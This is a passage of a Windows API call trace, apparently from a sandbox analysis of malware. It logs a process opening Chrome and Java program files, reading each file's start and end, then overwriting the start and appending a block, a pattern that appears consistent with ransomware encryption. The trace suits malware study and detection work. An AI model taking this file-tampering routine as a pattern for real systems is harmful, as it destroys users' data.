WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="es-419.pak", cchWideChar=10, lpMultiByteStr=0x1f735ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="es-419.pak", lpUsedDefaultChar=0x0) returned 10 [0117.967] ReadFile (in: hFile=0x20c, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0117.978] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4eca5 [0117.979] ReadFile (in: hFile=0x20c, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.985] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4eca5 [0117.985] WriteFile (in: hFile=0x20c, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.986] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0117.986] WriteFile (in: hFile=0x20c, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0117.987] CloseHandle (hObject=0x20c) returned 1 [0117.987] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\he.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\he.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0117.988] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.988] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5df23 [0117.988] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.988] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.988] ReleaseMutex (hMutex=0x168) returned 1 [0117.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="he.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0117.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="he.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="he.pak", lpUsedDefaultChar=0x0) returned 6 [0117.988] ReadFile (in: hFile=0x20c, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.008] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5cf23 [0118.008] ReadFile (in: hFile=0x20c, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.015] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5cf23 [0118.016] WriteFile (in: hFile=0x20c, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.017] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0118.017] WriteFile (in: hFile=0x20c, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.017] CloseHandle (hObject=0x20c) returned 1 [0118.017] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ko.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ko.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.018] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.018] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x50b94 [0118.018] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.018] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.018] ReleaseMutex (hMutex=0x168) returned 1 [0118.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ko.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ko.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ko.pak", lpUsedDefaultChar=0x0) returned 6 [0118.019] ReadFile (in: hFile=0x20c, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.032] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4fb94 [0118.032] ReadFile (in: hFile=0x20c, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.038] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4fb94 [0118.038] WriteFile (in: hFile=0x20c, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.563] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0118.563] WriteFile (in: hFile=0x20c, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.564] CloseHandle (hObject=0x20c) returned 1 [0118.564] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pl.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pl.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.565] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.565] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x500e8 [0118.565] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.565] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.565] ReleaseMutex (hMutex=0x168) returned 1 [0118.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pl.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pl.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pl.pak", lpUsedDefaultChar=0x0) returned 6 [0118.565] ReadFile (in: hFile=0x20c, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.593] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4f0e8 [0118.593] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.608] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4f0e8 [0118.608] WriteFile (in: hFile=0x20c, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.609] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0118.609] WriteFile (in: hFile=0x20c, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.609] CloseHandle (hObject=0x20c) returned 1 [0118.609] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sv.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sv.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.610] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.610] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x496bb [0118.610] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.610] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.610] ReleaseMutex (hMutex=0x168) returned 1 [0118.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sv.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0118.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sv.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac9c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sv.pak", lpUsedDefaultChar=0x0) returned 6 [0118.610] ReadFile (in: hFile=0x20c, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.614] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x486bb [0118.614] ReadFile (in: hFile=0x20c, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.714] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x486bb [0118.715] WriteFile (in: hFile=0x20c, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.715] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0118.715] WriteFile (in: hFile=0x20c, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.715] CloseHandle (hObject=0x20c) returned 1 [0118.742] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-CN.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-cn.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0118.742] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.742] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4217c [0118.742] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.742] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.743] ReleaseMutex (hMutex=0x168) returned 1 [0118.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-CN.pak", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0118.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-CN.pak", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zh-CN.pak", lpUsedDefaultChar=0x0) returned 9 [0118.743] ReadFile (in: hFile=0x1dc, lpBuffer=0x28a39d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x28a39d8*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.766] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4117c [0118.766] ReadFile (in: hFile=0x1dc, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.783] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4117c [0118.783] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.784] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0118.784] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.784] CloseHandle (hObject=0x1dc) returned 1 [0118.785] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0118.786] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.786] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1ef3 [0118.786] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.786] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.786] ReleaseMutex (hMutex=0x168) returned 1 [0118.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="smalllogo.png", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="smalllogo.png", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smalllogo.png", lpUsedDefaultChar=0x0) returned 13 [0118.786] ReadFile (in: hFile=0x1dc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1ef3, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f2bc*=0x1ef3, lpOverlapped=0x0) returned 1 [0118.799] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0118.800] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x247b, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x331f2d0*=0x247b, lpOverlapped=0x0) returned 1 [0118.801] CloseHandle (hObject=0x1dc) returned 1 [0118.801] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\Xusage.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\xusage.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0118.816] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.816] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5a7 [0118.816] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.816] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.816] ReleaseMutex (hMutex=0x168) returned 1 [0118.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xusage.txt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xusage.txt", cchWideChar=10, lpMultiByteStr=0x1f7360c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Xusage.txt", lpUsedDefaultChar=0x0) returned 10 [0118.816] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x5a7, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x331f2bc*=0x5a7, lpOverlapped=0x0) returned 1 [0118.834] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0118.834] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea99b8*, nNumberOfBytesToWrite=0xb2f, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea99b8*, lpNumberOfBytesWritten=0x331f2d0*=0xb2f, lpOverlapped=0x0) returned 1 [0118.834] CloseHandle (hObject=0x1dc) returned 1 [0118.834] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jqs.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jqs.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0118.836] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.836] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2c9a8 [0118.836] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0118.836] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.836] ReleaseMutex (hMutex=0x168) returned 1 [0118.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jqs.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0118.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jqs.exe", cchWideChar=7, lpMultiByteStr=0x1f7accc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jqs.exe", lpUsedDefaultChar=0x0) returned 7 [0118.836] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0118.868] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2b9a8 [0118.868] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea7988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0118.869] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2b9a8 [0118.869] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.869] SetFilePointer (in: hFile=0x1dc, 